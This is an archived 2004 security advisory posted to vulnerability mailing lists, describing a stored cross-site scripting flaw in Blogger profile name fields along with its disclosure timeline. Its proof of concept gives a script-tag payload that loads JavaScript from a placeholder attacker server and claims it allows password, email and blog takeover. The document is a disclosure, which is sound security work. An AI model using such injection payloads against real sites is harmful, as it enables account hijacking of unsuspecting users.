[VulnWatch] Blogger XSS Vulnerability
From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 03/26/04
- Previous message: Ferruh Mavituna: "[Full-Disclosure] Blogger XSS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, "'Secunia'" <vuln@secunia.com>, "'Vulnwatch'" <vulnwatch@vulnwatch.org>, <webappsec@securityfocus.com>, "Windows NTBugtraq Mailing List" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM> Date: Fri, 26 Mar 2004 17:15:41 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------
BLOGGER XSS VULNERABILITY
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent Account
Hijacking)
- ------------------------------------------------------
ABOUT BLOGGER;
- ------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web
instantly -- whenever the urge strikes. Blogger is the leading tool
in the rapidly growing area of web publishing known as weblogs, or
"blogs."
by Google (Pyra Labs acquired by Google)
- ------------------------------------------------------
XSS DETAILS;
- ------------------------------------------------------
There is no HTML filter when rendering user profiles. So anyone can
inject a script into a profile's "First Name" "Last Name" etc.
If you inject a code into "First Name" this will be print and run in
users's first page [www.blogger.com], so an attacker can easily gain
victim's account.
------------------------------------------------------
Proof Of Concept;
------------------------------------------------------
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to
victim "First Name"
Now you can execute anything in remote.
After login as your victim;
I. You can change password (without old password)
II. You can change e-mail address without any confirmation
III. You can own the victim blogs
*Replace ][,<>
*Script injection is limited to 50 characters (but it's pretty
enough to add js script)
- -----------------------------------------------------
HISTORY;
- ------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004
- ------------------------------------------------------
VENDOR STATUS;
- ------------------------------------------------------
Contact established with Google but there is no answer.
Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3
iQA/AwUBQGRJDzL0QoVzo2STEQJmRwCgxUQ+ZG5yfajXvitVnJDhB9e5lY4AoNGB
ANN10x5LT+9GahY9KvS9PURv
=YmrO
-----END PGP SIGNATURE-----
- Previous message: Ferruh Mavituna: "[Full-Disclosure] Blogger XSS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
